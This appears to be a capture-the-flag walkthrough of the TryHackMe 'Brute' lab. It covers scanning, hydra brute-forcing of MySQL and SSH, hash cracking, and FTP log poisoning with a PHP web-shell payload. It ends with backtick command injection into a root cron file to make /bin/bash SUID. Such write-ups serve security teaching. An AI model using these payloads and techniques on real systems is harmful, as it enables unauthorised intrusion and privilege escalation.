THM - BRUTE
Hi everyone,
today we see Brute room Created by hadrian3689
WE START!
We start the virtual machine wait for it to boot and browse the Web site:
login page, check the code
nothing interesting, let's try skipping the login with a sqli:
' OR 1 -- -OR 1=1admin' or '1'='1admin' or '1'='1'--
Nothing, you can have more payload here
Search with dirb:
Nothing interesting.
We use nmap with the command: sudo nmap -sV -O -A -T4 <IP>
Interesting we have port :21 and :3306 open so ftp and mysql.
Let's test ftp:
Nothing no access as an anonymous user.
So let's test mysql first with nmap: nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-enum
mmm, the room is called brute, let's try hydra on mysql with the root user, see if we have any luck!
we use the command: hydra -l root -P rockyou.txt <ip> mysql
it works! we have the root password to access mysql, let's log in!
Use: mysql -h <ip> -u root -p
okay, now we know a user's name, Adrian, now we use John to make in clear the password,
Now that we have Adrian's password let's connect via ssh!
Doesn't work, so let's try logging in with these credentials.
Well, within the site there are not many choices, let's press on Log and see what happens.
After some reflection I realize that I am reading the ftp logs.
Interesting let's try poisoning the logs.
I log into ftp and as the username I enter: '<?php system($_GET['p']); ?>'
I now go back to the site and enter in the url the parameters ?p=ls
it works!
Open burp
Now i try a reverse shell bash, nothing, i try a python one nothing.
I think, I try so python encoded url:
it works!
What does the html folder contain?
What does the html folder contain?
We open the config.php file and find the password of the adrian user related to the DB, but it doesn't look interesting.
I still try to use this password to access the terminal through this user. But it doesn't work.
I then proceed.
Let's go into Adrian's home and check what files are there, of course we logged in with the user www-data, let's check what files we can open
a cryptic message.
I think about it.
there is a file with the most used rules in the /rules folder of hashcat.
I then create a file labeled 'ettubrute' and 'ettubrute!' and we generate our wordlist with the command: hashcat --force password.txt -r /usr/share/hashcat/rules/best64.rule --stdout > listrule64.txt
We are returned a list of combinations that contain the words 'ettubrute' and 'ettubrute!'
Now we try to find out adrian's password to log in via ssh, we still use hydra:
Something is now accessing!
Well let's look around.
In its folder now we can access and read the files:
- ftp (folder)
- punch_in
- punch_in.sh
- user.txt
Now let's look at the other files:
We have 2 scripts and a file with logs every minute and notes.
From the .notes file we understand that the administrator wanted this punchin function implemented, the developer is upset about this and wrote another script that regularly executes every line of punch_in. So, if this script is run as root, we might be able to have commands run as root by writing in the punch_in file.
The punch_in.sh file writes to the punch_in file every minute.
The script file in /ftp/files reads the punch_in file
I then edit the punch_in file as the last line I enter the command: chmod +s /bin/bash and wait a few minutes.
But the permissions of /bin/bash do not change, does not work.
I try to enter the command between `: `chmod +s /bin/bash`
it works!
Now we type the command /bin/bash -p
GGGGreat! now let's find the flag
To conclude:
- enumeration with nmap and dirb
- hydra by brute force ssh and mysql
- john for cracking the hash
- log poisoning to insert malicious php code
- hashcat to create a list of words to access services
- code injection to escalate via SUID.
Really an interesting box thank you THM